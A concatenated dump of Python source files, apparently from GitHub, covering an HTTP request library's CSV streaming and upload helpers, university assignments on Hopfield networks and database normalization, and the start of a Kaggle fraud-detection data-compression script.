log.error(
"{0}: Unexpected Exception".format(request_label),
extra={
'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex),
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
raise
tmp_csv_file_size = os.path.getsize(tmp_csv_file_path)
bom_enc, bom_len, bom_header = detect_bom(tmp_csv_file_path)
log.info(
"{0}: By Chunk: Completed: Details".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'file_size': bytes_to_human(tmp_csv_file_size),
'chunk_total_sum': bytes_to_human(chunk_total_sum),
'bom_encoding': bom_enc
}
)
log.debug(
"{0}: Download CSV: Usage".format(request_label),
extra=env_usage(tmp_directory)
)
tmp_csv_file_name_wo_ext = \
os.path.splitext(
os.path.basename(tmp_csv_file_name)
)[0]
tmp_csv_file_path_wo_bom = "{0}/{1}_wo_bom.csv".format(tmp_directory, tmp_csv_file_name_wo_ext)
if os.path.exists(tmp_csv_file_path_wo_bom):
os.remove(tmp_csv_file_path_wo_bom)
bom_enc, bom_len = remove_bom(tmp_csv_file_path, tmp_csv_file_path_wo_bom)
log.debug(
"{0}: Encoding".format(request_label),
extra={
'bom_enc': bom_enc,
'bom_len': bom_len
}
)
if bom_len > 0:
tmp_csv_file_path = tmp_csv_file_path_wo_bom
return (tmp_csv_file_path, tmp_csv_file_size)
def stream_csv(
self,
request_url,
request_params,
csv_delimiter=',',
request_retry=None,
request_headers=None,
request_label=None,
chunk_size=1024,
decode_unicode=False,
remove_bom_length=0
):
"""Stream CSV and Yield JSON
Args:
request_url:
request_params:
csv_delimiter:
request_retry:
request_headers:
chunk_size:
decode_unicode:
remove_bom_length:
Returns:
"""
_request_label = "Stream CSV"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.info(
"{0}: Start".format(request_label),
extra={'report_url': request_url}
)
response = self.requests_client.request(
request_method='GET',
request_url=request_url,
request_params=request_params,
request_retry=request_retry,
request_headers=request_headers,
stream=True,
request_label="{0}: Request".format(request_label)
)
log.info(
"{0}: Response".format(request_label),
extra={
'response_status_code': response.status_code,
'response_headers': response.headers,
'report_url': request_url
}
)
request_curl = command_line_request_curl(
request_method='GET',
request_url=request_url,
request_params=request_params,
request_headers=request_headers,
)
validate_response(response=response, request_curl=request_curl, request_label="Stream CSV")
response_content_type = response.headers.get('Content-Type', None)
response_transfer_encoding = response.headers.get('Transfer-Encoding', None)
response_http_status_code = response.status_code
log.debug(
"{0}: Status: Details".format(request_label),
extra={
'response_content_type': response_content_type,
'response_transfer_encoding': response_transfer_encoding,
'response_http_status_code': response_http_status_code
}
)
log.debug("{0}: Usage".format(request_label), extra=env_usage())
line_count = 0
csv_keys_str = None
csv_keys_list = None
csv_keys_list_len = None
pre_str_line = None
for bytes_line in response.iter_lines(chunk_size=chunk_size, decode_unicode=decode_unicode):
if bytes_line: # filter out keep-alive new chunks
line_count += 1
str_line = bytes_line.decode("utf-8")
if line_count == 1:
if remove_bom_length > 0:
str_line = str_line[remove_bom_length:]
csv_keys_list = str_line.split(csv_delimiter)
csv_keys_list = [csv_key.strip() for csv_key in csv_keys_list]
csv_keys_list_len = len(csv_keys_list)
continue
if pre_str_line is not None:
str_line = pre_str_line + str_line
pre_str_line = None
csv_values_str = str_line.replace('\n', ' ').replace('\r', ' ')
csv_values_str_io = io.StringIO(csv_values_str)
reader = csv.reader(csv_values_str_io, delimiter=csv_delimiter)
csv_values_list = None
for row in reader:
csv_values_list = row
csv_values_list_len = len(csv_values_list)
if csv_values_list_len < csv_keys_list_len:
pre_str_line = str_line
continue
if csv_keys_list_len != csv_values_list_len:
log.error(
"{0}: Mismatch: CSV Key".format(request_label),
extra={
'line': line_count,
'csv_keys_list_len': csv_keys_list_len,
'csv_keys_str': csv_keys_str,
'csv_keys_list': csv_keys_list,
'csv_values_list_len': csv_values_list_len,
'csv_values_str': csv_values_str,
'csv_values_list': csv_values_list,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Mismatch: CSV Key '{1}': Values '{2}'".format(request_label, csv_keys_str, csv_values_str),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_UNEXPECTED_VALUE
)
json_data_row = {}
for idx, csv_key in enumerate(csv_keys_list):
csv_value = csv_values_list[idx]
json_data_row.update({csv_key: csv_value.strip('"')})
yield json_data_row
```
#### File: requests-fortified/pyfortified_requests/pyfortified_requests_upload.py
```python
import logging
from pyfortified_logging import (LoggingFormat, LoggingOutput)
from pyfortified_requests import (
__python_required_version__,
RequestsFortified,
)
from pyfortified_requests.errors import (
get_exception_message,
print_traceback,
RequestsFortifiedErrorCodes,
)
from pyfortified_requests.exceptions.custom import (
RequestsFortifiedBaseError,
RequestsFortifiedModuleError,
)
from pyfortified_requests.support import (
base_class_name,
mv_request_retry_excps_func,
python_check_version,
REQUEST_RETRY_EXCPS,
REQUEST_RETRY_HTTP_STATUS_CODES,
)
log = logging.getLogger(__name__)
python_check_version(__python_required_version__)
class RequestsFortifiedUpload(object):
__mv_request = None
def __init__(
self,
logger_level=logging.INFO,
logger_format=LoggingFormat.JSON,
logger_output=LoggingOutput.STDOUT_COLOR
):
self.mv_request = RequestsFortified(
logger_format=logger_format,
logger_level=logger_level,
logger_output=logger_output
)
@property
def logger(self):
return self.mv_request.logger
@property
def mv_request(self):
return self.__mv_request
@mv_request.setter
def mv_request(self, value):
self.__mv_request = value
def request(self, **kwargs):
return self.mv_request.request(**kwargs)
@property
def built_request_curl(self):
return self.mv_request.built_request_curl
def request_upload_json_file(
self,
upload_request_url,
upload_data_file_path,
upload_data_file_size,
is_upload_gzip,
request_label=None,
upload_timeout=None
):
"""Upload File to requested URL.
:param upload_request_url:
:param upload_data_file_path:
:param upload_data_file_size:
:param is_upload_gzip:
:param request_label:
:param upload_timeout:
:return:
"""
_request_label = "Request Upload JSON File"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
request_retry_excps = REQUEST_RETRY_EXCPS
request_retry_http_status_codes = REQUEST_RETRY_HTTP_STATUS_CODES
upload_request_retry = {"timeout": 60, "tries": -1, "delay": 60}
upload_request_headers = {'Content-Length': "{0}".format(upload_data_file_size)}
if is_upload_gzip:
upload_request_headers.update({'Content-Type': 'application/gzip'})
else:
upload_request_headers.update({'Content-Type': 'application/json; charset=utf8'})
if upload_timeout:
upload_request_retry["timeout"] = int(upload_timeout)
upload_extra = {
'upload_request_url': upload_request_url,
'upload_data_file_path': upload_data_file_path,
'upload_data_file_size': upload_data_file_size,
'upload_request_retry': upload_request_retry,
'upload_request_headers': upload_request_headers
}
log.info(
"{0}: Start".format(request_label),
extra=upload_extra
)
try:
with open(upload_data_file_path, 'rb') as upload_fp:
response = self.mv_request.request(
request_method='PUT',
request_url=upload_request_url,
request_params=None,
request_data=upload_fp,
request_retry=upload_request_retry,
request_headers=upload_request_headers,
request_retry_excps=request_retry_excps,
request_retry_http_status_codes=request_retry_http_status_codes,
request_retry_excps_func=mv_request_retry_excps_func,
allow_redirects=False,
build_request_curl=False,
request_label=request_label
)
except RequestsFortifiedBaseError as tmv_ex:
tmv_ex_extra = tmv_ex.to_dict()
tmv_ex_extra.update({'error_exception': base_class_name(tmv_ex)})
log.error("{0}: Failed".format(request_label), extra=tmv_ex_extra)
raise
except Exception as ex:
print_traceback(ex)
log.error(
"{0}: Failed: Unexpected".format(request_label),
extra={
'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex)
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Failed: Unexpected: {1}: {2}".format(request_label, base_class_name(ex), get_exception_message(ex)),
errors=ex,
error_code=RequestsFortifiedErrorCodes.REQ_ERR_UPLOAD_DATA
)
log.info(
"{0}: Finished".format(request_label)
)
return response
def request_upload_data(
self,
upload_request_url,
upload_data,
upload_data_size,
request_label=None,
upload_timeout=None,
build_request_curl=False
):
"""Upload Data to requested URL.
:param upload_request_url:
:param upload_data:
:param upload_data_size:
:param upload_timeout:
:return:
"""
_request_label = 'Request Upload Data'
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.info(
"{0}: Start".format(request_label),
extra={
'upload_data_size': upload_data_size,
'upload_request_url': upload_request_url,
}
)
request_retry_excps = REQUEST_RETRY_EXCPS
request_retry_http_status_codes = REQUEST_RETRY_HTTP_STATUS_CODES
upload_request_retry = {"timeout": 60, "tries": -1, "delay": 60}
request_headers = {
'Content-type': 'application/json; charset=utf8',
'Accept': 'text/plain',
'Content-Length': str(upload_data_size)
}
if upload_timeout:
upload_request_retry["timeout"] = int(upload_timeout)
try:
response = self.mv_request.request(
request_method='PUT',
request_url=upload_request_url,
request_params=None,
request_data=upload_data,
request_retry=upload_request_retry,
request_retry_excps=request_retry_excps,
request_retry_http_status_codes=request_retry_http_status_codes,
request_retry_excps_func=mv_request_retry_excps_func,
request_headers=request_headers,
allow_redirects=False,
build_request_curl=build_request_curl,
request_label=request_label
)
except RequestsFortifiedBaseError as tmv_ex:
tmv_ex_extra = tmv_ex.to_dict()
tmv_ex_extra.update({'error_exception': base_class_name(tmv_ex)})
log.error(
"{0}: Failed".format(request_label),
extra=tmv_ex_extra
)
raise
except Exception as ex:
print_traceback(ex)
log.error(
"{0}: Failed: Unexpected".format(request_label),
extra={'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex)}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Failed: Unexpected: {1}: {2}".format(request_label, base_class_name(ex), get_exception_message(ex)),
errors=ex,
error_code=RequestsFortifiedErrorCodes.REQ_ERR_UPLOAD_DATA
)
log.info("{0}: Finished".format(request_label))
return response
```
#### File: pyfortified_requests/support/retry_exception.py
```python
import logging
import requests
from pyfortified_requests import (
__python_required_version__,
)
from pyfortified_requests.errors import (
get_exception_message,
RequestsFortifiedErrorCodes,
)
from pyfortified_requests.exceptions.custom import (
RequestsFortifiedBaseError,
)
from pyfortified_requests.support.utils import (
base_class_name,
python_check_version,
)
log = logging.getLogger(__name__)
python_check_version(__python_required_version__)
def mv_request_retry_excps_func(excp, request_label=None):
"""Request Retry Exception Function
:param excp:
:param request_label:
:return:
"""
_request_label = 'Request Upload Exception'
request_label = '{}: {}'.format(request_label, _request_label) if request_label is not None else _request_label
error_exception = base_class_name(excp)
error_details = get_exception_message(excp)
if isinstance(excp, RequestsFortifiedBaseError):
log.debug(
"{0}: Expected".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
else:
log.debug(
"{0}: Unexpected".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
if isinstance(excp, requests.exceptions.ConnectionError):
if error_details.find('RemoteDisconnected') >= 0 or error_details.find('ConnectionResetError') >= 0:
log.debug(
"{0}: Retry".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
return True
if isinstance(excp, RequestsFortifiedBaseError) and excp.error_code == RequestsFortifiedErrorCodes.REQ_ERR_REQUEST_CONNECT:
if error_details.find('RemoteDisconnected') >= 0 or error_details.find('ConnectionResetError') >= 0:
log.debug(
"{0}: Retry".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
return True
log.debug(
"{0}: No Retry".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
return False
```
|
{
"source": "Jeff010101/CS5340-Uncertainty-Modeling-in-AI",
"score": 3
}
|
#### File: CS5340-Uncertainty-Modeling-in-AI/Hopfield/code.py
```python
import matplotlib
matplotlib.use('Agg')
import glob
import matplotlib.pyplot as plt
from PIL import Image, ImageOps
#Autograd
import autograd.numpy as np
from autograd import grad, jacobian, hessian
from autograd.scipy.stats import norm
from scipy.optimize import minimize
def load_image(fname):
img = Image.open(fname).resize((32, 32))
img_gray = img.convert('L')
img_eq = ImageOps.autocontrast(img_gray)
img_eq = np.array(img_eq.getdata()).reshape((img_eq.size[1], -1))
return img_eq
def binarize_image(img_eq):
img_bin = np.copy(img_eq)
img_bin[img_bin < 128] = -1
img_bin[img_bin >= 128] = 1
return img_bin
def add_corruption(img):
img = img.reshape((32, 32))
t = np.random.choice(3)
if t == 0:
i = np.random.randint(32)
img[i:(i + 8)] = -1
elif t == 1:
i = np.random.randint(32)
img[:, i:(i + 8)] = -1
else:
mask = np.sum([np.diag(-np.ones(32 - np.abs(i)), i)
for i in np.arange(-4, 5)], 0).astype(np.int)
img[mask == -1] = -1
return img.ravel()
def learn_hebbian(imgs):
img_size = np.prod(imgs[0].shape)
######################################################################
######################################################################
weights = np.zeros((img_size, img_size))
bias = np.zeros(img_size)
# Complete this function
# You are allowed to modify anything between these lines
# Helper functions are allowed
#flatten image
imgs_f = np.reshape(imgs,(len(imgs),img_size))
for img in imgs_f:
outer = np.outer(img,img)
weights += outer
diagW = np.diag(np.diag(weights))
weights = weights - diagW
weights /= len(imgs)
#######################################################################
#######################################################################
return weights, bias
def sigma(x):
return 1/(1+exp(-x))
from scipy.optimize import minimize
def learn_maxpl(imgs):
img_size = np.prod(imgs[0].shape)
######################################################################
######################################################################
weights = np.zeros((img_size, img_size))
bias = np.zeros(img_size)
# Complete this function
# You are allowed to modify anything between these lines
# Helper functions are allowed
# Avoid "overflow encountered in exp"
old_settings = np.seterr(all='ignore')
# Define log PseudoLikelihood function
def neg_logPL(W,b):
SUM=0
for img in imgs:
#flatten image
img_f = np.reshape(img,(1,img_size))
for i in range(len(img_f[0])):
x=img_f[0][i]
X=np.copy(img_f)
X[0][i]=0
if x==1:
SUM=SUM+np.log(1/(1+np.exp(-np.sum(W[i]*X[0])+b[i])))
else:
SUM=SUM+np.log(1-1/(1+np.exp(-np.sum(W[i]*X[0])+b[i])))
return -SUM
# Gradient descent on neg_logPL
neg_logPL_dW=grad(neg_logPL,0)
neg_logPL_db=grad(neg_logPL,1)
W=np.zeros((img_size,img_size))
b=np.zeros((img_size))
n_iteration=5
alpha=0.01
for i in range(n_iteration):
dW=neg_logPL_dW(W,b)
db=neg_logPL_db(W,b)
W=W-(dW+np.transpose(dW))*alpha
b=b-db*alpha
weights, bias = W,b
#######################################################################
#######################################################################
return weights, bias
def plot_results(imgs, cimgs, rimgs, fname='result.png'):
'''
This helper function can be used to visualize results.
'''
img_dim = 32
assert imgs.shape[0] == cimgs.shape[0] == rimgs.shape[0]
n_imgs = imgs.shape[0]
fig, axn = plt.subplots(n_imgs, 3, figsize=[8, 8])
for j in range(n_imgs):
axn[j][0].axis('off')
axn[j][0].imshow(imgs[j].reshape(img_dim, img_dim), cmap='Greys_r')
axn[0, 0].set_title('True')
for j in range(n_imgs):
axn[j][1].axis('off')
axn[j][1].imshow(cimgs[j].reshape(img_dim, img_dim), cmap='Greys_r')
axn[0, 1].set_title('Corrupted')
for j in range(n_imgs):
axn[j][2].axis('off')
axn[j][2].imshow(rimgs[j].reshape((img_dim, img_dim)), cmap='Greys_r')
axn[0, 2].set_title('Recovered')
fig.tight_layout()
plt.savefig(fname)
def recover(cimgs, W, b):
img_size = np.prod(cimgs[0].shape)
######################################################################
######################################################################
rimgs = []
# Complete this function
# You are allowed to modify anything between these lines
# Helper functions are allowed
#######################################################################
#######################################################################
rimgs = cimgs.copy()
num_iter = 20
for i in range(num_iter):
for j in range(len(rimgs)):
rimgs[j] = -((np.sign(1/(1+np.exp(W.dot(rimgs[j])+b))-0.5))).astype(int)
rimgs = rimgs.reshape((len(rimgs),32,32))
return rimgs
def main():
# Load Images and Binarize
ifiles = sorted(glob.glob('C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/images/*'))
timgs = [load_image(ifile) for ifile in ifiles]
imgs = np.asarray([binarize_image(img) for img in timgs])
# Add corruption
cimgs = []
for i, img in enumerate(imgs):
cimgs.append(add_corruption(np.copy(imgs[i])))
cimgs = np.asarray(cimgs)
# Recover 1 -- Hebbian
Wh, bh = learn_hebbian(imgs)
rimgs_h = recover(cimgs, Wh, bh)
np.save('hebbian.npy', rimgs_h)
plot_results(imgs, cimgs, rimgs_h, fname='C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/result_1.png') #C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/
# Recover 2 -- Max Pseudo Likelihood
Wmpl, bmpl = learn_maxpl(imgs)
rimgs_mpl = recover(cimgs, Wmpl, bmpl)
np.save('mpl.npy', rimgs_mpl)
plot_results(imgs, cimgs, rimgs_mpl, fname='C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/result_2.png')
if __name__ == '__main__':
main()
```
|
{
"source": "Jeff010101/CS5421-database-tuning",
"score": 2
}
|
#### File: CS5421-database-tuning/Normalization/project2_3.py
```python
student_no = 'XXXX'
## Determine the closure of set of attribute S given the schema R and functional dependency F
def closure(R, F, S):
Omega = F.copy()
Sigma = set(S)
f_p = []
while True:
for f in Omega:
if set(f[0]).issubset(Sigma):
f_p = f
break
if len(f_p) == 0:
break
Omega.remove(f_p)
Sigma.update(set(f_p[1]))
f_p = []
return sorted(Sigma)
## Determine the all the attribute closure excluding superkeys that are not candidate keys given the schema R and functional dependency F
# Get subset
# input: set A; output: all subset of set A
def Subset(items):
if len(items) == 0:
return [[]]
subsets = []
first_elt = items[0] #first element
rest_list = items[1:]
for partial_sebset in Subset(rest_list):
subsets.append(partial_sebset)
next_subset = partial_sebset[:] +[first_elt]
subsets.append(sorted(next_subset))
return sorted(subsets)
def all_closures(R, F):
subsets = Subset(R)
closures_all = []
key = []
for i in subsets:
if len(i)!=0:
closure_s = closure(R,F,i)
if len(closure_s) == len(R):
key.append(i)
else:
closures_all.append([i,closure_s])
for i in key: #remove superkey which is not candidate
n = 0
for j in key:
if set(j).issubset(i):
n = n+1
if n==1:
closures_all.append([i,R])
return sorted(closures_all)
## Return the candidate keys of a given schema R and functional dependencies F.
## NOTE: This function is not graded for CS5421 students.
def candidate_keys(R, F):
subsets = Subset(R)
closures_all = []
key = []
for i in subsets:
if len(i)!=0:
closure_s = closure(R,F,i)
if len(closure_s) == len(R):
key.append(i)
else:
closures_all.append([i,closure_s])
candidate_key = []
for i in key:
n = 0
for j in key:
if set(j).issubset(i):
n = n+1
if n==1:
candidate_key.append(i)
return sorted(candidate_key)
## Return a minimal cover of the functional dependencies of a given schema R and functional dependencies F.
## sigma_1 singliton the RHS
def get_sigma1(R,FD):
FD_new = []
for i in FD:
for j in i[1]:
FD_new.append([i[0],[j]])
return FD_new
## sigma_2 simplify LHS
# filiter naive FDs
def filter_naive(FD):
FD_new = []
for i in FD:
indictor = True
if (set(i[1]).issubset(set(i[0]))):
indictor = False
if indictor:
FD_new.append(i)
return FD_new
# simplify LHS of a single FD
def LHS_simply(R,FD, FDs):
X = FD[0]
Y = FD[1]
X_rm_l = []
X_rm = []
for i in X:
S = set(X.copy())
S.remove(i)
B = list(S)
S1 = set(closure(R,FDs,B))
if set(Y).issubset(S1) or set(i).issubset(S1):
X_rm_l.append(i)
if len(X_rm_l)==0:
return []
else:
for i in X_rm_l:
S = set(X)
S.remove(i)
B = list(S)
X_rm_n = LHS_simply(R,[B,Y], FDs)
if len(X_rm_n)==0:
X_rm.append([i])
else:
for j in X_rm_n:
X_rm.append([i]+j)
return X_rm
def LHS_simply1(R,FD, FDs):
X = FD[0]
Y = FD[1]
simple = LHS_simply(R,FD, FDs)
simple_1 = []
for i in simple:
indictor = True
for j in simple_1:
if len(set(j)-set(i))==0:
indictor = False
if indictor:
simple_1.append(i)
X_sim = []
if len(simple_1)==0:
return [FD]
else:
for i in simple_1:
S = set(X)
for j in i:
S.remove(j)
B = list(S)
X_sim.append(sorted(B))
FD_return = []
for i in X_sim:
FD_return.append([i, Y])
if len(X_sim)==1:
return sorted(FD_return)
else:
return sorted(FD_return)
# simplify LHS of all FDs, get all cases in integrated form
def get_sigma2_integ(R,sigma_1,FD):
sigma_2 = []
for i in range(0,len(sigma_1)):
simple_LHS = LHS_simply1(R,sigma_1[i], FD)
#print(simple_LHS)
sigma_2.append(simple_LHS)
return sorted(sigma_2)
# get all cases of FDs
def cross_join(A):
C = []
if len(A) == 1:
for i in A[0]:
C.append([i])
else:
for i in A[0]:
B = cross_join(A[1:])
for j in B:
C.append(j+[i])
return C
### remove same FDs and left one of them
def filter_same_dependence(FD):
FD_new = []
for i in FD:
indictor = True
#print(i)
X_1 = set(i[0])
Y_1 = set(i[1])
#print(i,FD_new)
for j in FD_new:
X_2 = set(j[0])
Y_2 = set(j[1])
#print(X_1,X_2,Y_1,Y_2)
if (len(X_1-X_2)==0 and len(X_2-X_1)==0) and (len(Y_1-Y_2)==0 and len(Y_2-Y_1)==0):
indictor = False
if indictor:
FD_new.append(i)
return sorted(FD_new)
def get_sigma2(R,sigma_1,FD):
A = get_sigma2_integ(R,sigma_1,FD)
C = sigma2_filter(A)
B = cross_join(C)
C_filter = []
for i in B:
C_filter.append(filter_same_dependence(i))
return sorted(C_filter)
# remove rebandant FDs in sigma2
# compare FD1 and FD2 are same
def compare_FD(FD_1,FD_2):
if len(FD_1)!=len(FD_2):
return False
else:
A = filter_same_dependence(FD_1+FD_2)
#print(len(A),A)
if len(A) == len(FD_1):
return True
else:
return False
# filter sigma_2 cases, remove the same case
def sigma2_filter(sigma_2):
A = []
i = 0
A.append(sigma_2[0])
while(i <= len(sigma_2)-1):
for j in range(i+1, len(sigma_2)+1):
if j>len(sigma_2)-1:
i = j
break
else:
indictor = compare_FD(sigma_2[i],sigma_2[j])
#print(i,j,indictor)
if (indictor==False):
A.append(sigma_2[j])
i = j
break
return A
def get_sigma3_case(FD,labels):
sigma = []
for i in labels:
sigma.append(FD[i])
return sigma
# remove rebandunt FD and get different case
def remove(R,FD,keep_label):
keep_label_set = set(keep_label)
#print(keep_label_set)
label_all = []
indictor = True
for i in keep_label_set:
label_new = keep_label_set-{i}
S = get_sigma3_case(FD,label_new-{i})
if set(FD[i][1]).issubset(closure(R,S,FD[i][0])):
keep_label_low = remove(R,FD,list(label_new))
#print(keep_label_low)
for j in keep_label_low:
label_all.append(j)
indictor = False
if indictor:
label_all = [keep_label]
#print(label_all)
return label_all
# remove same cases
def remove_same(labels):
label_new = []
for i in labels:
indictor = True
for j in label_new:
if len(set(i)-set(j))==0 and len(set(j)-set(i))==0:
indictor = False
#print(indictor)
if indictor:
label_new.append(i)
#print(label_new)
return label_new
# get sigma3 of different cases for different cases
def get_sigma3(R,sigma_2):
sigma_3 = []
for i in range(0,len(sigma_2)):
labels = remove_same(remove(R,sigma_2[i],range(0,len(sigma_2[i]))))
for j in range(0,len(labels)):
#print(sigma_2[i],labels[j])
A = get_sigma3_case(sigma_2[i],labels[j])
sigma_3.append(A)
return sorted(sigma_3)
# filter the same sigma3
def sigma3_filter(A):
return sigma2_filter(A)
def min_cover(R, FD):
sigma_1 = get_sigma1(R,FD)
sigma_1_filtered = filter_naive(sigma_1)
sigma_2 = get_sigma2(R,sigma_1_filtered,FD)
sigma_2_filtered = sigma2_filter(sigma_2)
sigma_3 = get_sigma3(R,sigma_2_filtered)
sigma_3_filtered = sigma3_filter(sigma_3)
return sigma_3_filtered[0]
## Return all minimal covers reachable from the functional dependencies of a given schema R and functional dependencies F.
## NOTE: This function is not graded for CS4221 students.
def min_covers(R, FD):
sigma_1 = get_sigma1(R,FD)
sigma_1_filtered = filter_naive(sigma_1)
sigma_2 = get_sigma2(R,sigma_1_filtered,FD)
sigma_2_filtered = sigma2_filter(sigma_2)
sigma_3 = get_sigma3(R,sigma_2_filtered)
sigma_3_filtered = sigma3_filter(sigma_3)
return sigma_3_filtered
## Return all minimal covers of a given schema R and functional dependencies F.
## NOTE: This function is not graded for CS4221 students.
def all_min_covers(R, FD):
sigma_plus = all_closures(R, FD)
sigma_1_plus = get_sigma1(R,sigma_plus)
sigma_1_plus_filtered = filter_naive(sigma_1_plus)
sigma_2_plus = get_sigma2(R,sigma_1_plus_filtered,FD)
sigma_2_plus_filtered = sigma2_filter(sigma_2_plus)
sigma_3_plus = get_sigma3(R,sigma_2_plus_filtered)
sigma_3_plus_filtered = sigma3_filter(sigma_3_plus)
return sigma_3_plus_filtered
# ### Test case from the project
# R = ['A', 'B', 'C', 'D']
# FD = [[['A', 'B'], ['C']], [['C'], ['D']]]
# print("Case 1:\nR = ", R,"\nFD = ", FD)
# print("closure of ['A']:")
# print(closure(R, FD, ['A']))
# print("closure of ['A', 'B']:")
# print(closure(R, FD, ['A', 'B']))
# print("all closures of FD:")
# print(all_closures(R, FD))
# #print(candidate_keys(R, FD))
# R = ['A', 'B', 'C', 'D', 'E', 'F']
# FD = [[['A'], ['B', 'C']],[['B'], ['C','D']], [['D'], ['B']],[['A','B','E'], ['F']]]
# print("Case 2:\nR = ", R,"\nFD = ", FD)
# print("a minimal cover of FD:")
# print(min_cover(R, FD))
R = ['A', 'B', 'C']
FD = [[['A'],['B']],[['B'],['C']],[['C'],['A']]]
# print("Case 3:\nR = ", R,"\nFD = ", FD)
# print("all minimal covers reachable for FD:")
# print(min_covers(R, FD))
# print("all minimal covers of FD:")
# print(all_min_covers(R, FD))
# ## Tutorial questions
# R = ['A', 'B', 'C', 'D', 'E']
# FD = [[['A', 'B'],['C']], [['D'],['D', 'B']], [['B'],['E']], [['E'],['D']], [['A', 'B', 'D'],['A', 'B', 'C', 'D']]]
# #print candidate_keys(R, FD)
# print("Case 4:\nR = ", R,"\nFD = ", FD)
# print("a minimal cover of FD:")
# print(min_cover(R, FD))
# print("all minimal covers reachable for FD:")
# print(min_covers(R, FD))
# print("all minimal covers reachable for FD:")
# print(all_min_covers(R, FD))
# R = ['A', 'B', 'C', 'D', 'E','F','G']
# FD = [[['A'],['B']], [['A'],['C']], [['B'],['C']], [['B'],['D']], [['D'],['B']], [['A','B','E'],['F']], [['A','E'],['D']]]
print("Case 4:\nR = ", R,"\nFD = ", FD)
print("closure:")
print(closure(R, FD, ['A']))
print("all closure:")
for i in all_closures(R, FD):
print(i)
print("candidate_keys:")
print(candidate_keys(R, FD))
# print(candidate_keys(R, FD))
print("a minimal cover of FD:")
for i in min_cover(R, FD):
print(i)
# print(min_cover(R, FD))
print("all minimal covers reachable for FD:")
for i in min_covers(R, FD):
print(i)
# print(min_covers(R, FD))
print("all minimal covers reachable for FD:")
# print((all_min_covers(R, FD)))
for i in all_min_covers(R, FD):
print(i)
```
#### File: CS5421-database-tuning/Serial/db_connect.py
```python
from sqlalchemy import create_engine
## Create a connection to the postgres database server.
def get_conn():
server = 'localhost'
dbname = 'cs4221'
username = 'postgres'
password = '<PASSWORD>'#postgres #MODIFIED
engine = create_engine('postgres://%s:%s@localhost:5432/%s' % (username, password, dbname))
return engine
```
|
{
"source": "Jeff010101/IEEE-CIS-Fraud-Detection",
"score": 3
}
|
#### File: Jeff010101/IEEE-CIS-Fraud-Detection/cis-datacompress.py
```python
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
# import os
# for dirname, _, filenames in os.walk('/kaggle/input'):
# for filename in filenames:
# print(os.path.join(dirname, filename))
# Any results you write to the current directory are saved as output.
# library
import os, warnings, random
from sklearn.preprocessing import LabelEncoder
warnings.filterwarnings('ignore')
## Seeder
# :seed to make all processes deterministic # type: int
def seed_everything(seed=0):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
## -------------------
## Memory Reducer
# :df pandas dataframe to reduce size # type: pd.DataFrame()
# :verbose # type: bool
def reduce_mem_usage(df, verbose=True):
numerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']
start_mem = df.memory_usage().sum() / 1024**2
for col in df.columns:
col_type = df[col].dtypes
if col_type in numerics:
c_min = df[col].min()
c_max = df[col].max()
if str(col_type)[:3] == 'int':
if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
else:
if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:
df[col] = df[col].astype(np.float16)
elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:
df[col] = df[col].astype(np.float32)
else:
df[col] = df[col].astype(np.float64)
end_mem = df.memory_usage().sum() / 1024**2
if verbose: print('Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)'.format(end_mem, 100 * (start_mem - end_mem) / start_mem))
return df
## -------------------
### set up
SEED = 42
seed_everything(SEED)
LOCAL_TEST = False
#################################################################################
print('Load Data')
train_df = pd.read_csv('data/train_transaction.csv')
test_df = pd.read_csv('data/test_transaction.csv')
test_df['isFraud'] = 0
train_identity = pd.read_csv('data/train_identity.csv')
test_identity = pd.read_csv('data/test_identity.csv')
########################### Base check ############################################
if LOCAL_TEST:
for df2 in [train_df, test_df, train_identity, test_identity]:
df = reduce_mem_usage(df2)
for col in list(df):
if not df[col].equals(df2[col]):
print('Bad transformation', col)
########################### Base Minification ####################################
train_df = reduce_mem_usage(train_df)
test_df = reduce_mem_usage(test_df)
train_identity = reduce_mem_usage(train_identity)
test_identity = reduce_mem_usage(test_identity)
########################### card4, card6, ProductCD#################################
# Converting Strings to ints(or floats if nan in column) using frequency encoding
# We will be able to use these columns as category or as numerical feature
for col in ['card4', 'card6', 'ProductCD']:
print('Encoding', col)
temp_df = pd.concat([train_df[[col]], test_df[[col]]])
col_encoded = temp_df[col].value_counts().to_dict()
train_df[col] = train_df[col].map(col_encoded)
test_df[col] = test_df[col].map(col_encoded)
print(col_encoded)
########################### M columns #########################################
# Converting Strings to ints(or floats if nan in column)
for col in ['M1','M2','M3','M5','M6','M7','M8','M9']:
